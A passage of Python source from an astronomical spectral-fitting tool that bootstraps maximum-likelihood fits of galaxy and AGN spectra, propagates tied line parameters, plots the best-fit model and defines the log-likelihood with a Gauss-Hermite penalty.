mcdisp = {k:np.empty(max_like_niter+1) for k in line_names}
line_names = [key+"_FWHM" for key in combined_line_list]
mcfwhm = {k:np.empty(max_like_niter+1) for k in line_names}
line_names = [key+"_VINT" for key in {**line_list, **combined_line_list}]
mcvint = {k:np.empty(max_like_niter+1) for k in line_names}
# component dictionary
mccomps = {k:np.empty((max_like_niter+1,len(comp_dict[k]))) for k in comp_dict}
# log-likelihood array
mcLL = np.empty(max_like_niter+1)
# Monochromatic continuum luminosities array
clum = []
if (lam_gal[0]<1350) & (lam_gal[-1]>1350):
clum.append("L_CONT_AGN_1350")
clum.append("L_CONT_HOST_1350")
clum.append("L_CONT_TOT_1350")
if (lam_gal[0]<3000) & (lam_gal[-1]>3000):
clum.append("L_CONT_AGN_3000")
clum.append("L_CONT_HOST_3000")
clum.append("L_CONT_TOT_3000")
if (lam_gal[0]<4000) & (lam_gal[-1]>4000):
clum.append("HOST_FRAC_4000")
clum.append("AGN_FRAC_4000")
if (lam_gal[0]<5100) & (lam_gal[-1]>5100):
clum.append("L_CONT_AGN_5100")
clum.append("L_CONT_HOST_5100")
clum.append("L_CONT_TOT_5100")
if (lam_gal[0]<7000) & (lam_gal[-1]>7000):
clum.append("HOST_FRAC_7000")
clum.append("AGN_FRAC_7000")
mccont = {k:np.empty(max_like_niter+1) for k in clum}
# Calculate fluxes
flux_dict = calc_max_like_flux(comp_dict, lam_gal)
# Calculate luminosities
lum_dict = calc_max_like_lum(flux_dict, z, H0=cosmology["H0"], Om0=cosmology["Om0"])
# Calculate equivalent widths
eqwidth_dict = calc_max_like_eqwidth(comp_dict, {**line_list, **combined_line_list}, lam_gal, noise, velscale)
# Calculate continuum luminosities
clum_dict = calc_max_like_cont_lum(clum, comp_dict, lam_gal, z, H0=cosmology["H0"], Om0=cosmology["Om0"])
# Calculate integrated line dispersions
disp_dict, fwhm_dict, vint_dict = calc_max_like_dispersions(comp_dict, {**line_list, **combined_line_list}, combined_line_list, lam_gal, noise, velscale)
# Add first iteration to arrays
# Add to mcpars dict
for i,key in enumerate(param_names):
mcpars[key][0] = result['x'][i]
# Add to mcflux dict
for key in flux_dict:
mcflux[key][0] = flux_dict[key]
# Add to mclum dict
for key in lum_dict:
mclum[key][0] = lum_dict[key]
# Add to mceqw dict
if eqwidth_dict is not None:
# Add to mceqw dict
for key in eqwidth_dict:
mceqw[key][0] = eqwidth_dict[key]
# Add to mcdisp dict
for key in disp_dict:
mcdisp[key][0] = disp_dict[key]
for key in fwhm_dict:
mcfwhm[key][0] = fwhm_dict[key]
for key in vint_dict:
mcvint[key][0] = vint_dict[key]
# Add components to mccomps
for key in comp_dict:
mccomps[key][0,:] = comp_dict[key]
# Add log-likelihood to mcLL
mcLL[0] = result["fun"]
# Add continuum luminosities
for key in clum_dict:
mccont[key][0] = clum_dict[key]
if (max_like_niter>0):
if verbose:
print( '\n Performing Monte Carlo bootstrapping...')
for n in range(1,max_like_niter+1,1):
# Generate a simulated galaxy spectrum with noise added at each pixel
mcgal = np.random.normal(galaxy,mcnoise)
		# Get rid of any infs or NaNs if there are any; these will cause scipy.optimize to fail
mcgal[~np.isfinite(mcgal)] = np.median(mcgal)
fit_type = 'init'
output_model = False
# if (cons is not None):
if 1:
nll = lambda *args: -lnlike(*args)
resultmc = op.minimize(fun = nll,
x0 = result['x'],
args=(param_names,
line_list,
combined_line_list,
soft_cons,
lam_gal,
mcgal, # use mcgal
mcnoise, # use mcnoise
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model),
method='SLSQP',
bounds = param_bounds,
constraints=cons,
options={'maxiter':2500,'disp': False})
mcLL[n] = resultmc["fun"] # add best fit function values to mcLL
# Get best-fit model components to calculate fluxes and equivalent widths
output_model = True
comp_dict = fit_model(resultmc["x"],
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# Calculate fluxes
flux_dict = calc_max_like_flux(comp_dict, lam_gal)
# Calculate luminosities
lum_dict = calc_max_like_lum(flux_dict, z, H0=cosmology["H0"], Om0=cosmology["Om0"])
# Calculate equivalent widths
eqwidth_dict = calc_max_like_eqwidth(comp_dict, {**line_list, **combined_line_list}, lam_gal, noise, velscale)
# Calculate continuum luminosities
clum_dict = calc_max_like_cont_lum(clum, comp_dict, lam_gal, z, H0=cosmology["H0"], Om0=cosmology["Om0"])
# Calculate integrated line dispersions
disp_dict, fwhm_dict, vint_dict = calc_max_like_dispersions(comp_dict, {**line_list, **combined_line_list}, combined_line_list, lam_gal, noise, velscale)
# Add to mc storage dictionaries
# Add to mcpars dict
for i,key in enumerate(param_names):
mcpars[key][n] = resultmc['x'][i]
# Add to mcflux dict
for key in flux_dict:
mcflux[key][n] = flux_dict[key]
# Add to mclum dict
for key in lum_dict:
mclum[key][n] = lum_dict[key]
# Add to mceqw dict
if eqwidth_dict is not None:
# Add to mceqw dict
for key in eqwidth_dict:
mceqw[key][n] = eqwidth_dict[key]
# Add components to mccomps
for key in comp_dict:
mccomps[key][n,:] = comp_dict[key]
# Add continuum luminosities
for key in clum_dict:
mccont[key][n] = clum_dict[key]
# Add to mcdisp dict
for key in disp_dict:
mcdisp[key][n] = disp_dict[key]
for key in fwhm_dict:
mcfwhm[key][n] = fwhm_dict[key]
for key in vint_dict:
mcvint[key][n] = vint_dict[key]
if verbose:
print(' Completed %d of %d iterations.' % (n,max_like_niter) )
# Iterate through every parameter to determine if the fit is "good" (more than 1-sigma away from bounds)
# if not, then add 1 to that parameter flag value
pdict = {} # parameter dictionary for all fitted parameters (free parameters, fluxes, luminosities, and equivalent widths)
best_param_dict = {} # For getting the best fit model components
# Add parameter names to pdict
for i,key in enumerate(param_names):
param_flags = 0
mc_med = np.median(mcpars[key])
mc_std = np.std(mcpars[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (mc_med-mc_std <= bounds[i][0]):
param_flags += 1
if (mc_med+mc_std >= bounds[i][1]):
param_flags += 1
if (mc_std==0):
param_flags += 1
pdict[param_names[i]] = {'med':mc_med,'std':mc_std,'flag':param_flags}
best_param_dict[param_names[i]] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add fluxes to pdict
for key in mcflux:
param_flags = 0
mc_med = np.median(mcflux[key])
mc_std = np.std(mcflux[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (key[:-5] in line_list):
if (line_list[key[:-5]]["line_type"]=="abs") & (mc_med+mc_std >= 0.0):
param_flags += 1
elif (line_list[key[:-5]]["line_type"]!="abs") & (mc_med-mc_std <= 0.0):
param_flags += 1
elif ((key[:-5] not in line_list) & (mc_med-mc_std <= 0.0)) or (mc_std==0):
param_flags += 1
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add luminosities to pdict
for key in mclum:
param_flags = 0
mc_med = np.median(mclum[key])
mc_std = np.std(mclum[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (key[:-4] in line_list):
if (line_list[key[:-4]]["line_type"]=="abs") & (mc_med+mc_std >= 0.0):
param_flags += 1
elif (line_list[key[:-4]]["line_type"]!="abs") & (mc_med-mc_std <= 0.0):
param_flags += 1
elif ((key[:-4] not in line_list) & (mc_med-mc_std <= 0.0)) or (mc_std==0):
param_flags += 1
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add equivalent widths to pdict
if eqwidth_dict is not None:
for key in mceqw:
param_flags = 0
mc_med = np.median(mceqw[key])
mc_std = np.std(mceqw[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (key[:-3] in line_list):
if (line_list[key[:-3]]["line_type"]=="abs") & (mc_med+mc_std >= 0.0):
param_flags += 1
elif (line_list[key[:-3]]["line_type"]!="abs") & (mc_med-mc_std <= 0.0):
param_flags += 1
elif ((key[:-3] not in line_list) & (mc_med-mc_std <= 0.0)) or (mc_std==0):
param_flags += 1
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add dispersions to pdict
for key in mcdisp:
param_flags = 0
mc_med = np.median(mcdisp[key])
mc_std = np.std(mcdisp[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add FWHMs to pdict
for key in mcfwhm:
param_flags = 0
mc_med = np.median(mcfwhm[key])
mc_std = np.std(mcfwhm[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add velocities to pdict
for key in mcvint:
param_flags = 0
mc_med = np.median(mcvint[key])
mc_std = np.std(mcvint[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add continuum luminosities to pdict
for key in mccont:
param_flags = 0
mc_med = np.median(mccont[key])
mc_std = np.std(mccont[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (mc_med-mc_std <= 0.0) or (mc_std==0):
param_flags += 1
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add log-likelihood function values
mc_med = np.median(mcLL)
mc_std = np.std(mcLL)
pdict["LOG_LIKE"] = {'med':mc_med,'std':mc_std,'flag':0}
#
# Add tied parameters explicitly to final parameter dictionary
pdict = max_like_add_tied_parameters(pdict,line_list)
#
# Calculate some fit quality parameters which will be added to the dictionary
# These will be appended to result_dict and need to be in the same format {"med": , "std", "flag":}
fit_quality_dict = fit_quality_pars(best_param_dict,line_list,combined_line_list,comp_dict,fit_mask,fit_type="max_like",fit_stat=fit_stat)
pdict = {**pdict,**fit_quality_dict}
if (test_outflows==True):
return pdict, mccomps, mcLL
# Get best-fit components for maximum likelihood plot
output_model = True
comp_dict = fit_model([best_param_dict[key]['med'] for key in best_param_dict],best_param_dict.keys(),
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# Plot results of maximum likelihood fit
sigma_resid, sigma_noise = max_like_plot(lam_gal,comp_dict,line_list,
[best_param_dict[key]['med'] for key in best_param_dict],
best_param_dict.keys(),fit_mask,run_dir)
#
if verbose:
print('\n Maximum Likelihood Best-fit Parameters:')
print('--------------------------------------------------------------------------------------')
print('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter', 'Best-fit Value', '+/- 1-sigma','Flag'))
print('--------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in pdict:
pname.append(key)
med.append(pdict[key]['med'])
std.append(pdict[key]['std'])
flag.append(pdict[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
if verbose:
for i in range(0,len(pname),1):
print('{0:<30}{1:<30.6f}{2:<30.6f}{3:<30}'.format(pname[i], med[i], std[i], flag[i] ))
if verbose:
print('{0:<30}{1:<30.6f}{2:<30}{3:<30}'.format('NOISE_STD', sigma_noise, ' ',' '))
print('{0:<30}{1:<30.6f}{2:<30}{3:<30}'.format('RESID_STD', sigma_resid, ' ',' '))
print('--------------------------------------------------------------------------------------')
# Write to log
write_log((pdict,sigma_noise,sigma_resid),'max_like_fit',run_dir)
#
return pdict, comp_dict
#### Add Tied Parameters Explicitly ##############################################
def max_like_add_tied_parameters(pdict,line_list):
# for key in pdict:
# print(key,pdict[key])
# Make dictionaries for pdict
param_names = [key for key in pdict]
med_dict = {key:pdict[key]["med"] for key in pdict}
std_dict = {key:pdict[key]["std"] for key in pdict}
flag_dict = {key:pdict[key]["flag"] for key in pdict}
# print()
for line in line_list:
for par in line_list[line]:
if (line_list[line][par]!="free") & (par in ["amp","fwhm","voff","shape","h3","h4","h5","h6","h7","h8","h9","h10"]):
expr = line_list[line][par] # expression to evaluate
expr_vars = [i for i in param_names if i in expr]
med = ne.evaluate(expr,local_dict = med_dict).item()
std = np.sqrt(np.sum(np.array([std_dict[i] for i in expr_vars],dtype=float)**2))
flag = np.sum([flag_dict[i] for i in expr_vars])
pdict[line+"_"+par.upper()] = {"med":med, "std":std, "flag":flag}
# for key in pdict:
# print(key,pdict[key])
return pdict
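# Note: in the tied-parameter helpers, the value of a tied parameter is obtained by evaluating its tie
# expression (via numexpr) on the best-fit values, while its uncertainty is propagated by adding the
# uncertainties of the parameters appearing in the expression in quadrature (i.e., assuming they are
# independent); flag values are simply summed.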
def add_tied_parameters(pdict,line_list):
# for key in pdict:
# print(key,pdict[key])
# Make dictionaries for pdict
param_names = [key for key in pdict]
# init_dict = {key:pdict[key]["init"] for key in pdict}
# plim_dict = {key:pdict[key]["plim"] for key in pdict}
chain_dict = {key:pdict[key]["chain"] for key in pdict}
par_best_dict = {key:pdict[key]["par_best"] for key in pdict}
ci_68_low_dict = {key:pdict[key]["ci_68_low"] for key in pdict}
ci_68_upp_dict = {key:pdict[key]["ci_68_upp"] for key in pdict}
ci_95_low_dict = {key:pdict[key]["ci_95_low"] for key in pdict}
ci_95_upp_dict = {key:pdict[key]["ci_95_upp"] for key in pdict}
mean_dict = {key:pdict[key]["mean"] for key in pdict}
std_dev_dict = {key:pdict[key]["std_dev"] for key in pdict}
median_dict = {key:pdict[key]["median"] for key in pdict}
med_abs_dev_dict = {key:pdict[key]["med_abs_dev"] for key in pdict}
flat_samp_dict = {key:pdict[key]["flat_chain"] for key in pdict}
flag_dict = {key:pdict[key]["flag"] for key in pdict}
# print()
for line in line_list:
for par in line_list[line]:
if (line_list[line][par]!="free") & (par in ["amp","fwhm","voff","shape","h3","h4","h5","h6","h7","h8","h9","h10"]):
expr = line_list[line][par] # expression to evaluate
expr_vars = [i for i in param_names if i in expr]
init = pdict[expr_vars[0]]["init"]
plim = pdict[expr_vars[0]]["plim"]
chain = ne.evaluate(line_list[line][par],local_dict = chain_dict)
par_best = ne.evaluate(line_list[line][par],local_dict = par_best_dict).item()
ci_68_low = np.sqrt(np.sum(np.array([ci_68_low_dict[i] for i in expr_vars],dtype=float)**2))
ci_68_upp = np.sqrt(np.sum(np.array([ci_68_upp_dict[i] for i in expr_vars],dtype=float)**2))
ci_95_low = np.sqrt(np.sum(np.array([ci_95_low_dict[i] for i in expr_vars],dtype=float)**2))
ci_95_upp = np.sqrt(np.sum(np.array([ci_95_upp_dict[i] for i in expr_vars],dtype=float)**2))
mean = np.sqrt(np.sum(np.array([mean_dict[i] for i in expr_vars],dtype=float)**2))
std_dev = np.sqrt(np.sum(np.array([std_dev_dict[i] for i in expr_vars],dtype=float)**2))
median = np.sqrt(np.sum(np.array([median_dict[i] for i in expr_vars],dtype=float)**2))
med_abs_dev = np.sqrt(np.sum(np.array([med_abs_dev_dict[i] for i in expr_vars],dtype=float)**2))
flag = np.sum([flag_dict[i] for i in expr_vars])
pdict[line+"_"+par.upper()] = {"init":init, "plim":plim, "chain":chain,
"par_best":par_best, "ci_68_low":ci_68_low, "ci_68_upp":ci_68_upp,
"ci_95_low":ci_95_low, "ci_95_upp":ci_95_upp,
"mean": mean, "std_dev":std_dev,
"median":median, "med_abs_dev":med_abs_dev,
"flag":flag}
# for key in pdict:
# print(key,pdict[key])
return pdict
##################################################################################
#### Max Likelihood Plot #########################################################
def max_like_plot(lam_gal,comp_dict,line_list,params,param_names,fit_mask,run_dir):
def poly_label(kind):
if kind=="ppoly":
order = len([p for p in param_names if p.startswith("PPOLY_") ])-1
if kind=="apoly":
order = len([p for p in param_names if p.startswith("APOLY_")])-1
if kind=="mpoly":
order = len([p for p in param_names if p.startswith("MPOLY_")])-1
#
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(n//10%10!=1)*(n%10<4)*n%10::4])
return ordinal(order)
def calc_new_center(center,voff):
"""
		Calculates the new line center shifted
		by some velocity offset.
"""
c = 299792.458 # speed of light (km/s)
new_center = (voff*center)/c + center
return new_center
# Put params in dictionary
p = dict(zip(param_names,params))
# Maximum Likelihood plot
fig = plt.figure(figsize=(14,6))
gs = gridspec.GridSpec(4, 1)
gs.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
ax1 = plt.subplot(gs[0:3,0])
ax2 = plt.subplot(gs[3,0])
for key in comp_dict:
if (key=='DATA'):
ax1.plot(comp_dict['WAVE'],comp_dict['DATA'],linewidth=0.5,color='white',label='Data',zorder=0)
elif (key=='MODEL'):
ax1.plot(lam_gal,comp_dict[key], color='xkcd:bright red', linewidth=1.0, label='Model', zorder=15)
elif (key=='HOST_GALAXY'):
ax1.plot(comp_dict['WAVE'], comp_dict['HOST_GALAXY'], color='xkcd:bright green', linewidth=0.5, linestyle='-', label='Host/Stellar')
elif (key=='POWER'):
ax1.plot(comp_dict['WAVE'], comp_dict['POWER'], color='xkcd:red' , linewidth=0.5, linestyle='--', label='AGN Cont.')
elif (key=='PPOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['PPOLY'], color='xkcd:magenta' , linewidth=0.5, linestyle='-', label='%s-order Poly.' % (poly_label("ppoly")))
elif (key=='APOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['APOLY'], color='xkcd:bright purple' , linewidth=0.5, linestyle='-', label='%s-order Add. Poly.' % (poly_label("apoly")))
elif (key=='MPOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['MPOLY'], color='xkcd:lavender' , linewidth=0.5, linestyle='-', label='%s-order Mult. Poly.' % (poly_label("mpoly")))
elif (key in ['NA_OPT_FEII_TEMPLATE','BR_OPT_FEII_TEMPLATE']):
ax1.plot(comp_dict['WAVE'], comp_dict['NA_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='Narrow FeII')
ax1.plot(comp_dict['WAVE'], comp_dict['BR_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='Broad FeII')
elif (key in ['F_OPT_FEII_TEMPLATE','S_OPT_FEII_TEMPLATE','G_OPT_FEII_TEMPLATE','Z_OPT_FEII_TEMPLATE']):
if key=='F_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['F_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='F-transition FeII')
elif key=='S_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['S_OPT_FEII_TEMPLATE'], color='xkcd:mustard', linewidth=0.5, linestyle='-' , label='S-transition FeII')
elif key=='G_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['G_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='G-transition FeII')
elif key=='Z_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['Z_OPT_FEII_TEMPLATE'], color='xkcd:rust', linewidth=0.5, linestyle='-' , label='Z-transition FeII')
elif (key=='UV_IRON_TEMPLATE'):
ax1.plot(comp_dict['WAVE'], comp_dict['UV_IRON_TEMPLATE'], color='xkcd:bright purple', linewidth=0.5, linestyle='-' , label='UV Iron' )
elif (key=='BALMER_CONT'):
ax1.plot(comp_dict['WAVE'], comp_dict['BALMER_CONT'], color='xkcd:bright green', linewidth=0.5, linestyle='--' , label='Balmer Continuum' )
# Plot emission lines by cross-referencing comp_dict with line_list
if (key in line_list):
if (line_list[key]["line_type"]=="na"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:cerulean', linewidth=0.5, linestyle='-', label='Narrow/Core Comp.')
if (line_list[key]["line_type"]=="br"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:bright teal', linewidth=0.5, linestyle='-', label='Broad Comp.')
if (line_list[key]["line_type"]=="out"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:bright pink', linewidth=0.5, linestyle='-', label='Outflow Comp.')
if (line_list[key]["line_type"]=="abs"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:pastel red', linewidth=0.5, linestyle='-', label='Absorption Comp.')
if (line_list[key]["line_type"]=="user"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:electric lime', linewidth=0.5, linestyle='-', label='Other')
# Plot bad pixels
ibad = [i for i in range(len(lam_gal)) if i not in fit_mask]
if (len(ibad)>0):# and (len(ibad[0])>1):
bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
		ax1.axvspan(bad_wave[0][0],bad_wave[0][1],alpha=0.25,color='xkcd:lime green',label="bad pixels")
		for i in bad_wave[1:]:
			ax1.axvspan(i[0],i[1],alpha=0.25,color='xkcd:lime green')
ax1.set_xticklabels([])
ax1.set_xlim(np.min(lam_gal)-10,np.max(lam_gal)+10)
# ax1.set_ylim(-0.5*np.median(comp_dict['MODEL']),np.max([comp_dict['DATA'],comp_dict['MODEL']]))
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=10)
# Residuals
sigma_resid = np.nanstd(comp_dict['DATA'][fit_mask]-comp_dict['MODEL'][fit_mask])
sigma_noise = np.median(comp_dict['NOISE'][fit_mask])
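	# The noise and residuals are scaled up by a factor of 3 for visibility in the lower panel;
	# the y-tick labels are divided by 3 further below so the axis still reads in native flux units.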
	ax2.plot(lam_gal,(comp_dict['NOISE']*3.0),linewidth=0.5,color="xkcd:bright orange",label=r'$\sigma_{\mathrm{noise}}=%0.4f$' % (sigma_noise))
	ax2.plot(lam_gal,(comp_dict['RESID']*3.0),linewidth=0.5,color="white",label=r'$\sigma_{\mathrm{resid}}=%0.4f$' % (sigma_resid))
ax1.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
ax2.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
# Axes limits
ax_low = np.nanmin([ax1.get_ylim()[0],ax2.get_ylim()[0]])
ax_upp = np.nanmax(comp_dict['DATA'][fit_mask])+(3.0 * np.nanmedian(comp_dict['NOISE'][fit_mask])) #np.nanmax([ax1.get_ylim()[1], ax2.get_ylim()[1]])
# if np.isfinite(sigma_resid):
# ax_upp += 3.0 * sigma_resid
	minimum = [np.nanmin(comp_dict[comp][np.isfinite(comp_dict[comp])]) for comp in comp_dict
			   if comp_dict[comp][np.isfinite(comp_dict[comp])].size > 0]
if len(minimum) > 0:
minimum = np.nanmin(minimum)
else:
minimum = 0.0
ax1.set_ylim(np.nanmin([0.0,minimum]),ax_upp)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax2.set_ylim(ax_low,ax_upp)
ax2.set_xlim(np.min(lam_gal),np.max(lam_gal))
# Axes labels
ax2.set_yticklabels(np.round(np.array(ax2.get_yticks()/3.0)))
ax2.set_ylabel(r'$\Delta f_\lambda$',fontsize=12)
ax2.set_xlabel(r'Wavelength, $\lambda\;(\mathrm{\AA})$',fontsize=12)
handles, labels = ax1.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
ax1.legend(by_label.values(), by_label.keys(),loc='upper right',fontsize=8)
ax2.legend(loc='upper right',fontsize=8)
# Emission line annotations
# Gather up emission line center wavelengths and labels (if available, removing any duplicates)
line_labels = []
for line in line_list:
if "label" in line_list[line]:
line_labels.append([line,line_list[line]["label"]])
line_labels = set(map(tuple, line_labels))
for label in line_labels:
center = line_list[label[0]]["center"]
if (line_list[label[0]]["voff"]=="free"):
voff = p[label[0]+"_VOFF"]
elif (line_list[label[0]]["voff"]!="free"):
voff = ne.evaluate(line_list[label[0]]["voff"],local_dict = p).item()
xloc = calc_new_center(center,voff)
offset_factor = 0.05
yloc = np.max([comp_dict["DATA"][find_nearest(lam_gal,xloc)[1]],comp_dict["MODEL"][find_nearest(lam_gal,xloc)[1]]])+(offset_factor*np.max(comp_dict["DATA"]))
ax1.annotate(label[1], xy=(xloc, yloc), xycoords='data',
xytext=(xloc, yloc), textcoords='data',
horizontalalignment='center', verticalalignment='bottom',
color='xkcd:white',fontsize=6,
)
# Title
ax1.set_title(str(run_dir.name),fontsize=12)
# Save figure
plt.savefig(run_dir.joinpath('max_likelihood_fit.pdf'))
# Close plot
fig.clear()
plt.close()
return sigma_resid, sigma_noise
##################################################################################
#### Likelihood Penalization for Gauss-Hermite Line Profiles #####################
def gh_penalty_ftn(line,params,param_names):
	# Penalize non-zero higher-order Gauss-Hermite moments (h3, h4, ...) so that, absent
	# strong evidence in the data, the line profile stays close to a simple Gaussian.
p = dict(zip(param_names, params))
#
gh_pnames = [i for i in param_names if i.startswith(line+"_H")]
if len(gh_pnames)==0:
return 0 # no penalty
elif len(gh_pnames)>0:
		D = np.sum([p[i]**2 for i in gh_pnames])
penalty = D
#
return penalty
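# Illustrative example (hypothetical parameter names): for a line "NA_OIII_5007" fit with a
# Gauss-Hermite profile and free h3/h4 moments, the penalty is NA_OIII_5007_H3**2 + NA_OIII_5007_H4**2,
# which lnlike() below uses to scale the log-likelihood (l + l*pen).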
#### Likelihood function #########################################################
# Maximum Likelihood (initial fitting), Prior, and log Probability functions
def lnlike(params,
param_names,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model):
"""
Log-likelihood function.
"""
# Create model
if (fit_type=='final') and (output_model==False):
model, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob = fit_model(params,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
if fit_stat=="ML":
# Calculate log-likelihood
l = -0.5*(galaxy[fit_mask]-model[fit_mask])**2/(noise[fit_mask])**2
l = np.sum(l,axis=0)
elif fit_stat=="OLS":
			# emcee maximizes the log-probability, whereas least squares is a minimization,
			# so the sum of squared residuals is negated.
l = (galaxy[fit_mask]-model[fit_mask])**2
l = -np.sum(l,axis=0)
elif fit_stat=="RMSE":
# Root-Mean Squared Error
l = (galaxy[fit_mask]-model[fit_mask])**2
l = -np.sqrt(np.sum(l,axis=0)/(len(galaxy[fit_mask])-1))
elif (fit_stat=="RCHI2"):
pdict = {p:params[i] for i,p in enumerate(param_names)}
noise_scale = pdict["NOISE_SCALE"]
# Calculate log-likelihood
l = -0.5*np.sum( (galaxy[fit_mask]-model[fit_mask])**2/(noise_scale*noise[fit_mask])**2 + np.log(2*np.pi*(noise_scale*noise[fit_mask])**2),axis=0)
# Determine if any Gauss-Hermite lines exist
pen = 0 # accumulating penalty
if np.isfinite(l):
for line in line_list:
if ((line_list[line]["line_profile"]=="GH")):
penalty = gh_penalty_ftn(line,params,param_names)
pen+= penalty
return l + l*pen, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob
else:
		# The maximum-likelihood routine minimizes the negative of the value returned here,
		# so for fit_stat="OLS" the sum of squared residuals (SSR) is negated.
model, comp_dict = fit_model(params,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
if fit_stat=="ML":
# Calculate log-likelihood
l = -0.5*(galaxy[fit_mask]-model[fit_mask])**2/(noise[fit_mask])**2
l = np.sum(l,axis=0)
# print("Log-Likelihood = %0.4f" % (l))
elif fit_stat=="OLS":
l = (galaxy[fit_mask]-model[fit_mask])**2
l = -np.sum(l,axis=0)
elif fit_stat=="RMSE":
# Root-Mean Squared Error
l = (galaxy[fit_mask]-model[fit_mask])**2
l = -np.sqrt(np.sum(l,axis=0)/(len(galaxy[fit_mask])-1))
elif (fit_stat=="RCHI2"):
pdict = {p:params[i] for i,p in enumerate(param_names)}
noise_scale = pdict["NOISE_SCALE"]
# Calculate log-likelihood
l = -0.5*np.sum( (galaxy[fit_mask]-model[fit_mask])**2/(noise_scale*noise[fit_mask])**2 + np.log(2*np.pi*(noise_scale*noise[fit_mask])**2),axis=0)
# Determine if any Gauss-Hermite lines exist
pen = 0 # accumulating penalty
if np.isfinite(l):
for line in line_list:
if ((line_list[line]["line_profile"]=="GH")):
penalty = gh_penalty_ftn(line,params,param_names)
pen+= penalty
#
return l + l*pen
##################################################################################
#### Priors ######################################################################
# These priors are the same constraints used for outflow testing and maximum likelihood
# fitting, simply formatted for use by emcee.
